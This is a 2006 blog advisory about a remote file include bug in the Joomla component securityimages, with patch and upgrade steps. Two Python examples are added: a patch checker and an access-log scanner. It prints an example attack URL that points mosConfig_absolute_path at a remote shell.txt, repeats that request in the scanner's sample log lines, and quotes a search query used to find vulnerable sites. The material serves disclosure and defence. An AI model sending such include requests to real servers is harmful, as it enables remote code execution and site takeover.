      Security risk in securityimages
      Tuesday, 01 August 2006 19:58


      The webmaster of janwiersma.com sent me an email today at 6:12 AM: his server was hacked because of a bug in securityimages. This bug allows a remote attacker to execute commands and functions on your server via a forced remote file include, and it affects ALL versions of securityimages <= 3.0.5.

      Here are all the files that put your server at risk:
      client.php, configinsert.php, lang.php, server.php

      Example of attack:
      http://web/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://shell.txt
      (from http://securityreason.com/exploitalert/892)
      Secunia also has a report on it: http://secunia.com/product/11186/

      In fact, I forgot to put this line at the top of these files:
      defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');
      This blocks any request that tries to access the file directly: Joomla defines _VALID_MOS in its own entry script, so the constant does not exist when a component file is called by its URL.

      - upgrade to 3.0.6 (download at Joomla Forge or in my download sections) OR
      - patch the faulty files by hand (add defined('_VALID_MOS') or die('Direct Access to this location is not allowed.'); at the beginning of each file)
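
      An added example, not part of the original post or of securityimages itself: a Python check that the hand patch really landed, by confirming that the first statement of every .php file under a component directory is the _VALID_MOS guard. The sample file contents are constructed; only the four file names come from the post.

```python
import re
import tempfile
from pathlib import Path

# The guard from the post: defined('_VALID_MOS') or die('...');
GUARD = re.compile(
    r"""defined\s*\(\s*['"]_VALID_MOS['"]\s*\)\s*(or|\|\|)\s*(die|exit)\b""", re.I)
# Allowed before the guard: open tag, whitespace, comments. Nothing executable.
SKIP = re.compile(r"\s+|<\?php\b|//[^\n]*|#[^\n]*|/\*.*?\*/", re.S | re.I)


def first_statement(source):
    """Return the first PHP statement, with the open tag and comments skipped."""
    pos = 0
    while (m := SKIP.match(source, pos)):
        pos = m.end()
    end = source.find(";", pos)
    return source[pos:] if end == -1 else source[pos:end]


def unguarded_files(component_dir):
    """Relative paths of .php files whose first statement is not the guard."""
    root = Path(component_dir)
    return [p.relative_to(root).as_posix()
            for p in sorted(root.rglob("*.php"))
            if not GUARD.match(first_statement(p.read_text(errors="replace")))]


def build_sample(root):
    """Constructed files: names are from the post, contents are invented."""
    guard = "defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');\n"
    include = "require_once($mosConfig_absolute_path . '/config.php');\n"
    samples = {
        "client.php": "<?php\n/* header */\n" + guard + include,  # patched
        "lang.php": "<?php\n" + include,                          # guard missing
        "server.php": "<?php\n" + include + guard,                # guard too late
        "configinsert.php": "<?php\n// " + guard + include,       # guard commented out
    }
    for name, body in samples.items():
        (Path(root) / name).write_text(body)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for name in unguarded_files(tmp):
            print("missing _VALID_MOS guard:", name)
```

      An empty list from unguarded_files() means every file starts with the guard; a guard that appears only after an include, or inside a comment, is reported as missing.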

      Please also contact all your friends who are using securityimages!

      What about my other components?

      Hashcash 1.2.X is also affected: http://secunia.com/product/11046/ and my patch is available!

      - upgrade to 1.2.2  (download at Joomla Forge or in my download sections) OR
      - patch the faulty files by hand (add defined('_VALID_MOS') or die('Direct Access to this location is not allowed.'); at the beginning of each file)

      JoomlaCloud is NOT affected





      YOU ARE ALL URGED TO UPGRADE ASAP!
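
      To check whether a site has already been probed, the request shown in the attack example can be searched for in the web server's access log. The Python below is an added example, not part of the original post; the log lines, client addresses and host names are constructed, and the Apache common log format is an assumption.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request field of an Apache common/combined log line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# A PHP file requested directly inside a component directory, not via index.php.
COMPONENT_FILE = re.compile(r"/components/com_[^/]+/.*\.php$", re.I)
REMOTE = re.compile(r"\s*(https?|ftp)://", re.I)

# Constructed sample lines; addresses and hosts use reserved documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [02/Jan/2006:10:00:01 +0100] "GET /index.php?option=com_contact HTTP/1.1" 200 5120
198.51.100.7 - - [02/Jan/2006:10:00:05 +0100] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://files.example.invalid/shell.txt HTTP/1.0" 200 312
198.51.100.7 - - [02/Jan/2006:10:00:09 +0100] "GET /components/com_securityimages/lang.php?mosConfig_absolute_path=http%3A%2F%2Ffiles.example.invalid%2Fshell.txt HTTP/1.0" 200 298
203.0.113.4 - - [02/Jan/2006:10:02:40 +0100] "GET /components/com_securityimages/server.php?mosConfig_absolute_path=/tmp HTTP/1.1" 200 44
192.0.2.10 - - [02/Jan/2006:10:03:02 +0100] "GET /components/com_securityimages/client.php?id=4 HTTP/1.1" 200 900
"""


def scan(log_text):
    """Return (client, verdict, path) for requests that set mosConfig_absolute_path."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.search(line)
        if not m:
            continue
        target = urlsplit(m.group(1))
        path = unquote(target.path)
        if not COMPONENT_FILE.search(path):
            continue
        # parse_qsl percent-decodes names and values, so encoded URLs are caught.
        for key, value in parse_qsl(target.query, keep_blank_values=True):
            if key == "mosConfig_absolute_path":
                verdict = "remote-include" if REMOTE.match(value) else "path-override"
                hits.append((line.split(" ", 1)[0], verdict, path))
                break
    return hits


if __name__ == "__main__":
    for client, verdict, path in scan(SAMPLE_LOG):
        print(client, verdict, path)
```

      A "path-override" hit carries a non-URL value; it is still reported because normal site traffic has no reason to pass mosConfig_absolute_path in a query string.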

      Comments
      Jan Wiersma  - 2 sites got hacked |82.161.149.xxx |2006-08-02 17:25:38
      Yes.. janwiersma.com and sepp.nl got hacked by this bug :cry

      After the hack I disabled SecurityImage but that does not work; if not upgrading to 3.0.6 then you have to uninstall the component to be safe!

      Finding out the hack entry was easy: after the hack, I checked the Webalizer logs and saw this:

      "Top 1 of 1 Total Search Strings: allinurl: com_securityimages"

      People looking (google-ing) for 'com_securityimages' ending up on my website? That must be the leak!

      So a quick google on 'com_securityimages & exploid' gives the answer:

      http://securityreason.com/exploitalert/892 8)
      Last Updated on Thursday, 17 August 2006 21:54
       
